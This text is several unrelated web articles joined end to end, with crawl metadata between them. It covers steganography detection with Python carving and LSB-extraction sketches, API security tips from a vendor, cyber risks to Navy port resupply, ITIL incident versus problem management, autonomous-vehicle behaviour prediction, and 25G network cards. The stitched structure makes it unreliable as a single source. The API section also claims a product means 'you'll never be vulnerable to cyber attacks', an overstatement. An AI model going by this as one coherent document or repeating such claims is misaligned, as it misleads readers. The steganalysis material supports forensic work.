Carrier File Types and Steganographic Techniques
The following sections will demonstrate commonly used steganographic techniques for different carrier file formats. Examples will be given for each file type and steganographic technique, including methods for detecting and extracting hidden information embedded using each technique.
All Files – The Append Technique
A commonly used steganographic technique that can be applied to any type of file is the appending method. This method appends the hidden information past the file’s end-of-file marker. The hidden information can be encrypted, compressed within a zip file, or left in plaintext. The appended information may also contain a signature for the steganography application that embedded it, the size of the hidden information, or the size of the original carrier file.
To illustrate the append steganographic technique, consider the following JPG image: baboon.jpg.
The JPG image format dictates that the byte sequence FF D9 indicates the end of the file. This can be seen by opening the file in a hex editor.
Hex editor view of baboon.jpg
A steganography application that uses the appending technique is used to hide a text file containing the Declaration of Independence in the baboon image. This particular application compresses the Declaration of Independence file into a standard zip file and appends it past the FF D9 end of image marker for JPG images. The ZIP file format dictates that the byte sequence 50 4B indicates the beginning of the file. This can also be seen with a hex editor.
Hex editor view of baboon.jpg with embedded Declaration of Independence.txt
This particular steganography application also embeds additional data used for decoding the hidden information. This data includes signature bytes that the steganography application uses to identify that the hidden information was embedded by itself (denoted by the red box in the diagram below), and a hash value representation of the user’s specified password (denoted by the green box).
Hex editor view of information appended by the steganography application
Extracting hidden information that has been embedded using the append steganographic technique involves identifying the end-of-file bytes of the original file and the hidden information that follows. Using a hex editor, the first step in extraction is to remove all of the original carrier file’s bytes. The bytes that remain contain the hidden information. The hidden information may be readable plaintext, encrypted, or compressed. If the hidden information is encrypted by a strong cipher, it may be difficult or even impossible to retrieve the deciphered hidden data. If the hidden information is compressed within a compressed ZIP file, the byte sequence 50 4B will denote its first two bytes. To recover the decompressed hidden data, first recover all bytes corresponding to the ZIP file and save them as a separate file. Try to extract the compressed file using WinZip or another decompression tool.
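The manual procedure just described can be approximated in a few lines of Python. This is a deliberately simplified sketch: it stops at the first FF D9 marker, whereas real JPG files can contain earlier markers (for example in embedded thumbnails) and legitimate trailing metadata, so a hit is a lead for further analysis rather than proof of steganography.

```python
JPEG_EOI = b"\xff\xd9"   # JPG end-of-image marker (FF D9)
ZIP_MAGIC = b"PK"        # 50 4B, the first two bytes of a ZIP archive

def carve_appended_data(jpg_path, out_path="carved_payload.bin"):
    with open(jpg_path, "rb") as f:
        data = f.read()
    marker = data.find(JPEG_EOI)
    if marker == -1:
        return "no end-of-image marker found"
    trailing = data[marker + len(JPEG_EOI):]
    if not trailing:
        return "no appended data found"
    with open(out_path, "wb") as f:
        f.write(trailing)
    kind = "ZIP archive" if trailing.startswith(ZIP_MAGIC) else "unidentified data"
    return f"{len(trailing)} appended bytes saved to {out_path} ({kind})"

# print(carve_appended_data("baboon.jpg"))
```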
The SARC has developed in-house tools for extracting information embedded by the append steganographic technique. If you are interested in steganalysis services, please contact the SARC at (304) 366-9161 or [email protected] for further details.
BMP – The Least Significant Bit Technique
A commonly used steganographic technique that can be applied to BMP graphic files is the Least Significant Bit (LSB) method. As its name implies, the LSB method replaces the least significant bit in the data bytes of the image to embed the hidden information. These bit changes do not cause significant quality degradation in the image, especially for 24-bit BMP files. Sometimes, a steganography application can use the least two significant bits in the bytes to embed the hidden information.
To illustrate the LSB steganographic technique, consider the following BMP image: house.bmp.
The LSB steganographic technique encodes messages in the least significant bit of every byte in an image. By doing so, the value of each pixel is changed slightly, but not enough to make significant visual changes to the image, even when compared to the original. Comparing the original carrier file with the same file that has been manipulated by the LSB technique in a hex editor shows a variance in some byte values. Notice in the figure below that the highlighted byte values differ in value by one.
Hex editor comparison
house.bmp (without steganography)
house.bmp (with steganography)
This manual inspection of files is not practical in most digital forensics investigations, since it is not likely that both a clean carrier file will exist along with the carrier file with steganography embedded within it. A more effective approach to LSB analysis is to conduct LSB enhancement. This technique “enhances” image pixel bytes by setting the value of all bits within each byte to the value of the least significant bit. For example, consider the byte 4B. The bitwise representation of 4B is 01001011. LSB enhancement sets all bits to 1, the value of the least significant bit. The resulting byte value of FF replaces the original byte value of 4B.
The images below are LSB enhancements of the house image. Notice that the image containing steganography has a lattice pattern at the bottom. This pattern is a telltale sign that ASCII text has been embedded using the LSB technique.
Enhanced house.bmp (without steganography)
Enhanced house.bmp (with steganography)
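The enhancement transform described above is straightforward to reproduce. The sketch below assumes the Pillow imaging library (an assumption, not something this article specifies) and applies the transform to every sample of an uncompressed image:

```python
from PIL import Image   # third-party: pip install Pillow

def lsb_enhance(in_path, out_path):
    """Set each sample to 255 if its least significant bit is 1, otherwise to 0."""
    img = Image.open(in_path).convert("RGB")
    enhanced = img.point(lambda v: 255 if v & 1 else 0)
    enhanced.save(out_path)

# lsb_enhance("house.bmp", "house_enhanced.bmp")
```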
The LSB steganographic technique can also be implemented to modify any number of least significant bits. For example, an application may modify the least two significant bits to hide information. The greater the number of bits an application modifies, the greater the reduction of picture quality and chance for visual attack.
Extracting hidden information that has been embedded using the LSB technique involves determining the number of bits used for encoding. After extracting the encoding bits, they must be reassembled to create the hidden information. Some steganography applications employ various randomization techniques for reassembling the encoded bits. For straightforward embedding, simply reconstruct eight bits into each byte of the hidden data.
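For the straightforward (non-randomized) case mentioned above, extraction can be sketched as follows. Pillow is again assumed, and the bit order used when reassembling bytes (most significant bit first) is a guess that a real tool would need to confirm for each application.

```python
from PIL import Image   # third-party: pip install Pillow

def extract_lsb(in_path, num_bytes):
    """Collect the least significant bit of each sample and pack eight bits per byte."""
    samples = Image.open(in_path).convert("RGB").tobytes()
    bits = [s & 1 for s in samples[:num_bytes * 8]]
    hidden = bytearray()
    for i in range(0, len(bits), 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit     # MSB-first packing; some tools pack LSB-first
        hidden.append(byte)
    return bytes(hidden)

# print(extract_lsb("house.bmp", 64))
```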
Criminals have always sought ways to conceal their activity in real, or physical, space. The same is true in virtual, or cyber space. Digital steganography represents a particularly significant threat today because of the large number of digital steganography applications freely available on the Internet that can be used to hide any digital file inside of another digital file. Use of these applications, which are both easy to obtain and simple to use, allows criminals to conceal their activities in cyber space.
Thus, steganography presents a significant challenge to law enforcement as well as the intelligence community because detecting hidden information and then extracting that information is very difficult and may be impossible in some cases.
By providing a national repository of steganography application hash values, or fingerprints, and developing tools, techniques, and procedures to detect fingerprints and signatures on suspect media and then find and extract hidden information, the SARC is rapidly evolving into a high-value law enforcement, homeland security, and national security asset in the global war on terrorism and efforts to combat cyber crime.
James E. Wingate, CISSP-ISSEP, CISM, IAM
Director, Steganography Analysis & Research Center
Vice President for West Virginia Operations
320 Adams Street, Suite 105
Fairmont, WV 26554
Office: 304.366.9161 Fax: 304.366.9163
Chad W. Davis
Computer Security Engineer
320 Adams Street, Suite 105
Fairmont, WV 26554
Steganography Analysis and Research Center | <urn:uuid:c730f006-5a08-4269-afe4-65491796b22d> | CC-MAIN-2022-40 | https://www.forensicfocus.com/articles/an-analytical-approach-to-steganalysis/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337490.6/warc/CC-MAIN-20221004085909-20221004115909-00002.warc.gz | en | 0.906129 | 4,502 | 2.578125 | 3 |
API security should never be taken for granted. With the increasing demand for data-centric projects, companies have quickly opened up to their ecosystem through SOAP or REST APIs.
Application Programming Interfaces (or APIs for short) are the doors to closely guarded data of a company. They’re extremely useful because they allow two different applications to communicate.
On the surface, this is great because they make life much easier for developers, but at the same time, it creates the following challenge: How can we keep the doors open for the API ecosystem and sealed off from hackers at the same time?
There are ways you can do it and strategies that you can employ to reap the benefits that APIs offer while keeping all of your data safe. So, let’s go over some API security best practices. Here are 12 simple tips to avoid security risks and secure your APIs.
1. Encryption
Be cryptic. Nothing should be in the clear for internal or external communications. Encryption will convert your information into code. This will make it much more difficult for sensitive data to end up in the wrong hands.
You and your partners should cipher all exchanges with TLS (the successor to SSL), whether it is one-way encryption (standard one-way TLS) or, even better, mutual encryption (two-way TLS).
Use the latest TLS versions to block the usage of the weakest cipher suites.
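As one hedged, client-side example of refusing the weakest protocol versions, the Python snippet below builds an ssl context that will not negotiate anything older than TLS 1.2; the URL is a placeholder, and equivalent settings exist on servers, load balancers, and API gateways.

```python
import ssl
import urllib.request

context = ssl.create_default_context()            # certificate verification stays on
context.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse SSLv3 and TLS 1.0/1.1

with urllib.request.urlopen("https://api.example.com/health", context=context) as resp:
    print(resp.status)
```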
Don’t talk to strangers. In simple terms, authenticity is real. It means something (or someone) is who they say they are. In the digital world, authentication is the process of verifying a user’s identity. It essentially pulls off the mask of anyone who wants to see your information.
So, you should always know who is calling your APIs. There are several methods to authenticate:
- HTTP Basic authentication where a user needs to provide user ID and password
- API key where a user needs to provide a unique identifier configured for each API and known to the API Gateway
- A token that is generated by an Identity Provider (IdP) server. OAuth 2 is the most popular protocol that supports this method.
At the very least you should use an API key (asymmetric key) or basic access authentication (user/password) to increase the difficulty of hacking your system. But you should consider OAuth 2 as your protocol of choice for robust API security.
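A minimal sketch of the API key variant is shown below, written with Flask purely for illustration (the article does not prescribe a framework, and key storage, rotation, and HTTPS are out of scope here):

```python
from flask import Flask, abort, jsonify, request

app = Flask(__name__)

# In practice keys live in a secrets store or gateway configuration, not in source code.
VALID_API_KEYS = {"k-3f9a2c-example": "partner-app-1"}

@app.before_request
def require_api_key():
    if request.headers.get("X-API-Key") not in VALID_API_KEYS:
        abort(401)                 # reject unidentified callers before any handler runs

@app.route("/orders")
def list_orders():
    caller = VALID_API_KEYS[request.headers["X-API-Key"]]
    return jsonify({"caller": caller, "orders": []})

# app.run()   # then: curl -H "X-API-Key: k-3f9a2c-example" http://localhost:5000/orders
```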
3. OAuth & OpenID Connect
Delegate all responsibilities. A good manager delegates responsibility, and so does a great API. You should be delegating authorization and/or authentication of your APIs to third party Identity Providers (IdP).
What is OAuth 2? It is a magical mechanism preventing you from having to remember ten thousand passwords. Instead of creating an account on every website, you can connect through another provider’s credentials, for example, Facebook or Google.
It works the same way for APIs: the API provider relies on a third-party server to manage authorizations. The consumer doesn’t input their credentials but instead gives a token provided by the third-party server. It protects the consumer as they don’t disclose their credentials, and the API provider doesn’t need to care about protecting authorization data, as it only receives tokens.
OAuth is a commonly used delegation protocol to convey authorizations. To secure your APIs even further and add authentication, you can add an identity layer on top of it: this is the Open Id Connect standard, extending OAuth 2.0 with ID tokens.
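As a hedged sketch of what the consumer side of such a token exchange can look like (a client-credentials grant using the requests library; the endpoints and credentials are placeholders):

```python
import requests   # third-party: pip install requests

TOKEN_URL = "https://idp.example.com/oauth2/token"   # hypothetical IdP endpoint
API_URL = "https://api.example.com/orders"           # hypothetical protected API

def get_access_token(client_id, client_secret):
    resp = requests.post(
        TOKEN_URL,
        data={"grant_type": "client_credentials", "scope": "orders:read"},
        auth=(client_id, client_secret),   # credentials go to the IdP, never to the API
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()["access_token"]

def call_api(token):
    # The API provider only ever sees the short-lived bearer token.
    return requests.get(API_URL, headers={"Authorization": f"Bearer {token}"}, timeout=10)
```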
4. Call security experts
Don’t be afraid to ask for (or use) some help. Call in some security experts. Use experienced Antivirus systems or ICAP (Internet Content Adaptation Protocol) servers to help you with scanning payload of your APIs. It will help you to prevent any malicious code or data affecting your systems.
There are several security APIs you can use to protect your data. They can do things like:
- Integrate two-factor authentication
- Create passwordless login, or time-based one-time passwords
- Send out push alerts if there’s a breach
- Protect against viruses and malware
- Prevent fraud
- Let you know if a password is a known password used by hackers
- Add threat intelligence
- Provide security monitoring
The best part is that some of these antivirus systems are free to use. Others offer monthly plans. Premium plans will provide more protection, but you can decide for yourself the type of security you need.
5. Monitoring: audit, log, and version
Be a stalker. Continually monitoring your API and what it’s up to can pay off. Be vigilant like that overprotective parent who wants to know everything about the people around their son or daughter.
How do you do this? You need to be ready to troubleshoot in case of error. You’ll want to audit and log relevant information on the server — and keep that history as long as it is reasonable in terms of capacity for your production servers.
Turn your logs into resources for debugging in case of any incidents. Keeping a thorough record will help you keep track and make anything that’s suspicious more noticeable.
Also, monitoring dashboards are highly recommended tools to track your API consumption.
Do not forget to add a version to all APIs, preferably in the path of the API, so that several versions can run side by side and older versions can be deprecated and retired.
6. Share as little as possible
Be paranoid. It’s OK to be overly cautious. Remember, it’s vital to protect your data.
Display as little information as possible in your answers, especially in error messages. Lock down email subjects and content to predefined messages that can’t be customized. Because IP addresses can give locations, keep them for yourself.
Use IP Whitelist and IP Blacklist, if possible, to restrict access to your resources. Limit the number of administrators, separate access into different roles, and hide sensitive information in all your interfaces.
7. System protection with throttling and quotas
Throttle yourself. You should restrict access to your system to a limited number of messages per second to protect your backend system bandwidth according to your servers’ capacity. Less is more.
You should also restrict access by API and by user (or application) to ensure that no one will abuse the system or any one API in particular.
Throttling limits and quotas – when well set – are crucial to prevent attacks coming from different sources flooding your system with multiple requests (DDOS – Distributed Denial of Service Attack). A DDOS can lock legitimate users out of their own network resources.
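Gateways normally enforce this for you, but the underlying idea is easy to show. Here is a small, single-process token-bucket sketch in Python, purely illustrative since real deployments need shared state across gateway nodes:

```python
import time

class TokenBucket:
    """Allow roughly `rate` requests per second, with bursts up to `capacity`."""
    def __init__(self, rate, capacity):
        self.rate = rate
        self.capacity = capacity
        self.tokens = capacity
        self.updated = time.monotonic()

    def allow(self):
        now = time.monotonic()
        # Refill in proportion to the time elapsed since the last request.
        self.tokens = min(self.capacity, self.tokens + (now - self.updated) * self.rate)
        self.updated = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

buckets = {}   # one bucket per consumer (API key, application, source IP, ...)

def should_reject(api_key):
    bucket = buckets.setdefault(api_key, TokenBucket(rate=5, capacity=10))
    return not bucket.allow()   # True means answer with HTTP 429 Too Many Requests
```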
8. Data validation
Be picky and refuse surprise gifts, especially if they are significantly large. You should check everything your server accepts. Be careful to reject any added content or data that is too big, and always check the content that consumers are sending you. Use JSON or XML schema validation and check that your parameters are what they should be (string, integer…) to prevent any SQL injection or XML bomb.
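A hedged example of such schema validation with the third-party jsonschema package (any schema validator would do, and the schema itself is invented):

```python
from jsonschema import ValidationError, validate   # pip install jsonschema

ORDER_SCHEMA = {
    "type": "object",
    "properties": {
        "customer_id": {"type": "integer"},
        "quantity": {"type": "integer", "minimum": 1, "maximum": 1000},
        "note": {"type": "string", "maxLength": 500},
    },
    "required": ["customer_id", "quantity"],
    "additionalProperties": False,   # reject unexpected fields outright
}

def payload_is_valid(payload):
    try:
        validate(instance=payload, schema=ORDER_SCHEMA)
        return True
    except ValidationError:
        # Log the detail server-side; return only a generic error to the caller.
        return False

print(payload_is_valid({"customer_id": 42, "quantity": 3}))                       # True
print(payload_is_valid({"customer_id": "42; DROP TABLE orders", "quantity": 3}))  # False
```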
9. Infrastructure
Network and be up to date. A good API should lean on a good security network, infrastructure, and up-to-date software (for servers, load balancers) to be solid and always benefit from the latest security fixes.
10. OWASP Top 10
Avoid wasps. The OWASP (Open Web Application Security Project) Top 10 is a list of the ten worst vulnerabilities, ranked according to their exploitability and impact. In addition to the above points, to review your system, ensure you have secured all OWASP vulnerabilities.
11. API firewalling
Build a wall. For some people, building a wall can solve all the immigration problems. This is the case, for APIs at least! Your API security should be organized into two layers:
- The first layer is in DMZ, with an API firewall to execute basic security mechanisms like checking the message size, SQL injections, and any security based on the HTTP layer, blocking intruders early. Then forward the message to the second layer.
- The second layer is in LAN with advanced security mechanisms on data content.
The more challenging you make it for cyber attackers to get at your information, the better.
12. API Gateway (API Management)
Gateway to heaven. All the above mechanisms are long to implement and maintain. Instead of reinventing the wheel, you should opt for a mature and high-performing API Management solution with all these options to save your money, time, and resources and increase your time to market. An API Gateway will help you secure, control, and monitor your traffic.
In addition to helping you secure your APIs easily, an API Management solution will help you make sense of your API data to make technical and business decisions: the key to success!
Now you know more about the basic mechanisms to protect your APIs! Have fun securing your APIs, hopefully with a great API Management solution.
Don’t take API security for granted
It’s unfortunate, but internet threats abound, and hackers are relentless. Implementing a solid API security plan is critical to protecting your information. Crucially, the ultimate best practice is to build API security into the general mindset and process of how APIs are designed and developed.
Axway’s Amplify API Management Platform makes it easier than ever to secure your digital experiences. It not only monitors and protects your API, but you’ll also have all of the information you need in one place. It’s visible and easy to read. You’ll never be vulnerable to cyber attacks, allowing you to focus on what you need to get done.
And if you combine the right technology with a more deliberate process, building security into the design process from the start, you can uncover and address security threats before they arise.
Learn more about how an open platform fortifies security in a world of rapidly evolving cyberattacks. | <urn:uuid:20583286-982d-406a-b8d9-4148ac2fdb00> | CC-MAIN-2022-40 | https://blog.axway.com/learning-center/digital-security/keys-oauth/api-security-best-practices?utm_source=axway&utm_medium=blog&utm_campaign=gc_open_banking&utm_term=null&utm_content=blog&utm_id=null | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337906.7/warc/CC-MAIN-20221007014029-20221007044029-00002.warc.gz | en | 0.910612 | 2,076 | 2.53125 | 3 |
As large-scale cyber attacks by China and Russia on American government agencies and corporations have demonstrated, it can be difficult to prevent nation-states from planting malware on sensitive networks—even those with strict access controls. It can also be difficult to know that it has happened. Suspected Russian hackers in the SolarWinds supply-chain attack remained undetected on networks for as long as 9 months before they were discovered.
This kind of vulnerability has significant implications for Navy cybersecurity, including at ports in the Pacific where replenishment ships take on supplies. One of the risks is that an adversary could plant malware on port computer systems and then activate it at a critical moment, crippling resupply operations. This might unfold, for example, if a naval confrontation between the U.S. and an adversary in the U.S. Indo-Pacific Command Area of Responsibility (INDOPACOM AOR) seemed imminent, and the Navy wanted to top off fuel, munitions, and other supplies on combatant ships for maximum mobility and flexibility.
It wouldn’t be necessary for the malware to infect and disable every supply-related computer system in a port—a single attack anywhere along the line could disrupt the entire resupply operation. For example, malware could disable the pumps that transfer fuel to the replenishment ships, or the cranes that load palletized munitions and other supplies. Malware could freeze the inventory-control systems that dictate which supplies go on which ships, or it could cut the power in critical places.
Ports around the world are being increasingly targeted by hackers. Cyber attacks on the maritime industry’s operational technology (OT) systems have grown by at least 900% over the last 3 years, with some port operations being knocked out for days or even weeks, according to the maritime cybersecurity company Naval Dome.
Current cybersecurity measures at Navy-controlled and commercial ports tend to focus on identity and access management, dictating who has access to which systems. While that is critical, it is not enough. Nation-states like China and Russia are increasingly adept at bypassing identity and access controls in sensitive networks—such as with last year’s SolarWinds attack, which came through a routine software update to thousands of customers, including in parts of the Pentagon and other federal agencies. China is accused of an even more massive attack on U.S. government and business organizations this year, in which hackers exploited vulnerabilities in a Microsoft email service to plant hidden malware.
While such attacks have proven hard to prevent, the Navy can take specific steps to strengthen cybersecurity at Navy-controlled and commercial ports in the Pacific and elsewhere. There is no silver bullet, however. Defending ports against sophisticated cyber attacks calls for a multifaceted approach—one that combines traditional methods, such as redundancy and manual backups, with advanced technologies such as artificial intelligence (AI)-enabled threat detection. Such an approach focuses not just on protecting the IT and OT systems in ports from malware intrusion, but on keeping them resilient in the face of a successful breach. | <urn:uuid:26f8dd4e-d593-4975-8ea0-4fc6b4dcff0b> | CC-MAIN-2022-40 | https://www.boozallen.com/markets/defense/indo-pacific/cyberattacks-on-navy-port-supply-operations.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337906.7/warc/CC-MAIN-20221007014029-20221007044029-00002.warc.gz | en | 0.958206 | 616 | 2.578125 | 3 |
How ITIL differentiates an Incident from a Problem
An ITIL concept that many of us find difficult to understand is how to differentiate an incident from a problem. Incident management and problem management are part of the fourth stage of the ITIL lifecycle – Service Operation – which is responsible for an organization’s business-as-usual (BAU) activities.
What is an Incident?
An incident is an unplanned event that causes, or may cause, an interruption to service delivery or a reduction in service quality. It can be a single, unique issue impacting one customer or a similar issue impacting a number of customers. Depending upon the criticality of the issue, an incident needs to be resolved quickly to limit its impact.
A planned outage or scheduled maintenance service is not an incident. But if it exceeds the planned schedule time, then it becomes an incident.
Objective of Incident management:
Incident management is carried out by a group (service desk, technical support, hardware/software support teams) responsible for resolving an incident as quickly as possible so that the agreed service level agreements (SLAs) are met. If the group is unable to resolve the issue permanently, it provides a temporary fix or a workaround.
What is a Problem?
An incident can raise a problem if it happens again and again. According to ITIL, a recurring incident is escalated to a problem so that root cause analysis can be performed. A problem is not itself an incident, but it may cause incidents if it is not resolved. It is much more serious than an incident and needs to be analyzed and followed up separately.
A problem can be raised and linked to a single incident or to a number of incidents for root cause analysis. A problem becomes a ‘known error’ once its cause has been identified.
Objective of Problem management
Problem management supports incident management by performing root cause analysis of an issue and taking the necessary steps to ensure that the issue doesn’t occur again in the future.
Incident Vs Problem
ITIL encourages an organization to distinguish between an incident and a problem because they are handled, responded to, and resolved differently. An incident may be closed with a temporary fix, but the solution to a problem is a permanent fix.
To differentiate this further, let us take an example:
Suppose there is a telephone conversation going on between you and your friend. All of a sudden the call drops because there is no coverage. This is an incident, as it has disrupted the service. You fix it by restarting your phone or troubleshooting the available options. Once the conversation starts again, the incident is closed. But if the issue keeps occurring, you have a problem. To fix this problem, you need to either contact the mobile service provider about the disrupted service due to the low network signal or change your mobile phone.
An effective incident management function ensures that all interrupted services are handled, responded to, and restored within the agreed SLA timeframe. An effective problem management function, on the other hand, proactively responds to incidents so that they don’t recur. Significantly more processes and resources are involved, and it takes a bit more time to fix the issue permanently. | <urn:uuid:4de8811e-f26d-4179-9cf0-f153e7b8ace6> | CC-MAIN-2022-40 | https://www.greycampus.com/blog/it-service-management/how-an-itil-differentiates-an-incident-and-a-problem | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00202.warc.gz | en | 0.946773 | 652 | 2.59375 | 3 |
12 Nov Using Behavioral Prediction in Autonomous Vehicles
Over the next decade autonomous vehicles (AVs) are expected to reduce the number of road accidents and to improve overall road safety. Behavioral prediction plays a key role in efficient decision making and enables risk assessment in AV applications. For example, suppose you are driving on a two-lane road and intend to turn left while another car in the oncoming lane approaches from the opposite direction. How will that vehicle behave? Will it continue straight? Will it make a turn? Prediction in autonomous vehicles means predicting the trajectory or path of the other vehicle and deciding on an appropriate action to avoid a collision.
Road geometry and traffic rules can completely change the behavior of vehicles. For instance, the behavior of vehicles approaching a four-way ‘STOP’ sign can change instantly. A model trained in a static driving environment, without considering traffic rules and road geometry, would prove of limited value in other driving environments. Accurate prediction of vehicle behavior requires a multimodal approach. Multimodal means that more than one possible future action exists given the history of motion of a vehicle. For example, when a vehicle is approaching a ‘STOP’ sign without a turn-signal indicator, it can either go straight or make a turn.
Building an AV Prediction Model
To understand its environment and the dynamics and future behaviors of surrounding objects, the AV model requires data input. The typical inputs for AV prediction come from sensor fusion and localization. Sensor fusion data is generated by using a Kalman filter to combine inputs from multiple sensors (radar, LIDAR, etc.).
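To make the Kalman filter step concrete, here is a deliberately simplified one-dimensional sketch (constant-state model, numpy) that fuses noisy range readings from two hypothetical sensors into one estimate; production sensor fusion uses multi-dimensional state vectors, motion models, and per-sensor noise covariances.

```python
import numpy as np

def kalman_1d(measurements, meas_var, process_var=1e-3):
    """Fuse a stream of noisy scalar measurements into a single running estimate."""
    x, p = float(measurements[0]), 1.0    # initial estimate and its variance
    for z in measurements[1:]:
        p = p + process_var               # predict: uncertainty grows between readings
        k = p / (p + meas_var)            # Kalman gain: how much to trust the new reading
        x = x + k * (z - x)               # update the estimate toward the measurement
        p = (1 - k) * p                   # shrink the uncertainty accordingly
    return x

# Interleaved, noisy distance readings (metres) to the same object from two sensors.
radar = 25.0 + np.random.normal(0.0, 0.5, 10)
lidar = 25.0 + np.random.normal(0.0, 0.1, 10)
readings = np.ravel(np.column_stack([radar, lidar]))
print(round(kalman_1d(readings, meas_var=0.3), 2))   # close to the true 25.0 m
```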
Bird’s-Eye View (BEV) rasterization is a common choice as the system’s input when working with AV data. BEV consists of top-down views of a scene. Building models using BEV simplifies the prediction process because the coordinate spaces of the input and output are the same. Infrastructure sensors can provide a non-occluded top-down view of the environment.
A self-driving system is a multi-agent environment. A deep supervised learning approach can address the multiagent environment by accurately capturing rare and unexpected behaviors on the road. Within the AV stack, the three tasks involved in building a self-driving system could be defined as follows:
- Perception (identifying objects around the AV)
- Prediction (determining appropriate next steps)
- Planning (deciding future AV behaviors)
Focusing on prediction, one can build a model to provide the AV with critical data related to potential future behaviors. Research has shown that among deep learning-based models, complex models (e.g., multiple RNNs, ResNet, or combinations of RNNs and CNNs) achieve better performance than simple models such as a single RNN.
Predicting a multimodal trajectory instead of a unimodal trajectory might not always result in lower RMSE but can achieve better overall performance. For example, the models named GRIP and ST-LSTM achieved better performance than M-LSTM and CS-LSTM because GRIP and ST-LSTM dealt with multimodal trajectories. Higher RMSE could be the result of limited model capacity and/or limited data used in the training of multimodal trajectory prediction models.
Improving AV Prediction Models:
There are several mechanisms that can be employed to improve the overall performance of AV prediction models. Those would include the following:
- Training speed: Increasing the dimensions of the first and last layer of the deep network improves speed and use of lighter EfficientNet instead of ResNet improves model performance.
- Performance: Adding agent history to the prediction model can improve prediction accuracy and reliability.
- Uncertainty capture: Multimodal prediction is preferred when one trajectory per agent is not enough to capture and analyze various situational uncertainties.
Evaluation metrics in AV prediction depend on how many factors are being predicted. Typical metrics for vehicle behavior prediction include accuracy, precision, recall, F1 score, and negative log-likelihood. Trajectory prediction evaluation metrics include FDE (final displacement error), MAE (mean absolute error), RMSE (root mean square error), the minimum-over-K metric, and cross entropy.
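For reference, several of these trajectory metrics can be computed in a few lines; the numpy sketch below treats a trajectory as an array of (x, y) points and implements the minimum-over-K idea as a best-of-K final displacement error.

```python
import numpy as np

def rmse(pred, gt):
    """Root mean square displacement error over a trajectory of shape (T, 2)."""
    return float(np.sqrt(np.mean(np.sum((pred - gt) ** 2, axis=-1))))

def fde(pred, gt):
    """Final displacement error: distance between the predicted and true endpoints."""
    return float(np.linalg.norm(pred[-1] - gt[-1]))

def min_fde_over_k(pred_modes, gt):
    """Best-of-K endpoint error for a multimodal prediction of shape (K, T, 2)."""
    return min(fde(mode, gt) for mode in pred_modes)

gt = np.array([[0, 0], [1, 0], [2, 0], [3, 0]], dtype=float)      # ground truth
single = gt + 0.2                                                  # one offset hypothesis
modes = np.stack([gt + 0.2, gt + np.array([0.0, 1.5])])           # straight vs. drifting
print(rmse(single, gt), fde(single, gt), min_fde_over_k(modes, gt))
```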
Deep learning solutions have shown promising performance for trajectory and behavior prediction in complex driving scenarios. Most existing solutions only consider the interaction among vehicles. These solutions provide a very narrow assessment of potential behaviors. Models that incorporate traffic rules, road geometry, environment conditions and other variables produce predictive analysis that is much deeper and broader.
Vehicle behavior prediction is a complex process. There are still many challenges that can only be met via utilization of next-generation technologies and applications.
25G NIC - the Highly Effective Path Towards 100G Network
25G and 40G are competing with each other in the upgrade from 10G to 100G in data centers. Backed by the endorsement of large cloud providers such as Google and Microsoft, more and more people are in favor of 25GbE, and it seems that 25G will finally surpass 40G as the most widely deployed server access speed. As a result, 25G products keep popping up in the market. One key component in the entire 25G/100G structure is the 25G NIC. This post will shed light on this little flat card.
What Is 25G NIC?
A network interface card (NIC), also known as a server adapter, is a printed circuit board that provides network communication capabilities to and from a computer. It is usually a separate adapter card that can be inserted into one of the server’s motherboard expansion slots. This device works at the physical layer and the data link layer and has a unique physical network address, also referred to as a MAC address. The side plate of the NIC is usually built with an interface, and some server NICs have two or more network interfaces built into a single card. 40Gb Ethernet is now in a transition period; however, the bandwidth of a 40G network card is more than most servers need, and the cost is also relatively high. A 25G NIC is exactly what is needed at this moment in time.
Why Do We Need 25G NIC?
The trend to 25G Ethernet networking is backed by the impressive performance and the cost of 25G Ethernet networking technology. The popularity of 25G server connectivity drives the robust demand for 25G NIC. 25G technology allows more bits to pass through a single strand of copper/fiber cabling. That is to say, 100G migration can be realized by 4 strands of 25G, saving a lot of space and materials compared with 10 strands of cable when used with legacy 10G technology. Besides, it is predicted that 25G Ethernet leaf switch ports should have a less than 10% premium over 10G, while reaching the crossing point in 2019.
25G NIC Facilitate 25G ToR Switch to 25G Server Connection
A 25G NIC greatly boosts 10G-25G-100G or 10G-25G-50G-100G server connections, making them more cost-effective than the current 10G-40G-100G Ethernet speed upgrade model. When deploying a 25G Ethernet network, a ToR switching architecture is often applied.
In a ToR configuration, 25G ToR switches are placed in the top of each cabinet, connecting directly to the 25G servers in the cabinet via point-to-point cabling. 25G NICs are used in each 25G server. All 25GbE servers can be connected to 25GbE switch ports via 25G DAC/AOC cables or 25G SR transceiver and fiber patch cables. FS 25G NIC also delivers excellent performance for 25GbE connectivity that is backwards compatible with 1/10GbE, making the migration to a higher speed easier.
How to Choose 25G NIC?
The NIC in a server computer connects many network users to the server. For a heavily used server, it is worth investing more on a higher-quality NIC. Some name-brand manufacturers such as Mellanox, Dell, HPE, Intel, SMC, 3Com as well as FS.COM are competing in this field. Here are some points to consider when choosing an appropriate 25G NIC.
Interfaces or outlets on the card are used to connect the communication media. They accept SFP28 fiber optic transceivers or SFP28 DAC cables for 25G connections. There are 1-port, 2-port, 4-port and even 6-port 25G NICs in the market. These multiple ports are used to access diverse networks, storage, management and so on. Choose the right 25G NIC with certain ports according to your applications.
The bus interface that the card connects to is also a critical consideration. PCIe (Peripheral Component Interconnect Express) is the recommended interface for 25G server adapters, as it is much faster than the older ISA (Industry Standard Architecture) bus. There are various versions of PCIe, such as PCIe 1.0, PCIe 2.0, PCIe 3.0, and PCIe 4.0, among which PCIe 3.0 x8 is the most common interface in 25G NICs from various manufacturers. The number after the x indicates the physical size of the PCIe card or slot, with x16 being the largest and x1 the smallest, while the number after PCIe indicates the version of the PCI Express specification that is supported. PCIe 3.0 is considerably faster than PCIe 1.0 and PCIe 2.0, as it can support a bandwidth of 7.877 Gbit/s (984.625 MB/s) per lane. To capitalize on PCIe 3.0 x8, your motherboard should support PCIe 3.0 and have a free PCIe x8 slot, so take into consideration the hardware you own or intend to buy before you make a decision.
